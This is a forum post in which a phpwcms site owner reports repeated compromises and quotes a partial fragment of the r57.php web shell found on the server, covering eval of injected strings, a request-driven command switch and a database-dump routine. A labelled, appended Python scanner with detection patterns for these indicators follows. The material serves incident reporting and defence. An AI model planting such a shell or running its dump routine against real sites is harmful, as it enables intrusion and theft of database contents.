I posted this one not too long ago...
Oliver Georgi wrote: Normally phpwcms is (should be) safe - and I have not heard of any other hacked 1.3.3.
Oliver
http://www.phpwcms.de/forum/viewtopic.php?t=15646
I've been hacked over and over and over again. It's getting really old and I'm on the verge of moving to something else if I can't find out why.
I really love the program and would hate to have to transition to something else...but when I have about 40 sites on the same server and ONLY the phpWCMS ones are getting hit...something is wrong.
My hosting: Fatnetwork (reseller hosting, shared servers, globalvars is on - not sure how to turn them off if I don't own the server - and safemode is off)
Also, here is the code for the file that I found on my server allowing it to gain access to virtually everything...I can't read Arabic, so I'm not sure just how far it really goes. Oliver, I hope you can make some REAL sense of this and hopefully identify some way we can protect ourselves from it.
The file was saved as r57.php and if you Google that, there are TONS of reports of people being hacked by it. Mambo, phpWCMS, and other users alike.
Code:
","",$eval);
@eval($eval);}
if ($_POST['cmd']=="mysql_dump")
{
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
else {
if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
else { echo "[-] ERROR! Can't write in dump file"; }
}
}
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
...........
[Notice: Code partially removed by Oliver]
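A defender-side check for the kind of file described in this post, added here as an example and not code from the post, from phpwcms, or from the r57 file: it scans PHP sources for the indicators visible in the quoted fragment (eval of a runtime string, a $_POST['cmd'] switch, fopen on a request-supplied filename, the mysql_dump branch) and flags files where several co-occur. The pattern list, the thresholds and the two embedded sample files are constructed assumptions, not signatures taken from any product.

```python
# Added example (not the forum post's or phpwcms's code): flag PHP files carrying
# indicators seen in the quoted r57 fragment. Patterns are assumptions drawn from
# that fragment, not an exhaustive signature set; tune them for your own tree.
import os
import re

INDICATORS = [  # (label, regex), each constructed from a line of the fragment above
    ("eval of runtime string", re.compile(r"@?\beval\s*\(")),
    ("POST-driven command switch", re.compile(r"\$_(POST|GET|REQUEST)\[['\"]cmd['\"]\]")),
    ("file opened with request-supplied name", re.compile(r"fopen\s*\(\s*\$_(POST|GET|REQUEST)\[")),
    ("database dump via request params", re.compile(r"mysql_dump|\$_POST\[['\"]mysql_[lp]['\"]\]")),
]

def scan_php_source(text):
    """Return [(line_number, label)] for every indicator hit, in file order."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((lineno, label))
    return hits

def scan_tree(root, min_hits=2):
    """Walk a webroot; return {path: hits} for PHP files with >= min_hits distinct indicators."""
    flagged = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
            except OSError:
                continue
            if len({label for _, label in hits}) >= min_hits:  # distinct indicators, not raw count
                flagged[path] = hits
    return flagged

# Constructed samples: a slice of the quoted fragment, and a benign file that reads POST data.
SHELL_SAMPLE = """<?php
@eval($eval);
if ($_POST['cmd']=="mysql_dump") {
  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  $sql->user = $_POST['mysql_l'];
}
"""
BENIGN_SAMPLE = "<?php\necho htmlspecialchars($_POST['name']);\n"
```

Run `scan_tree("/path/to/webroot")` on a copy of the hosting account; a file that trips several distinct indicators is worth a manual read, while a single eval hit on its own is often a false positive from templating code.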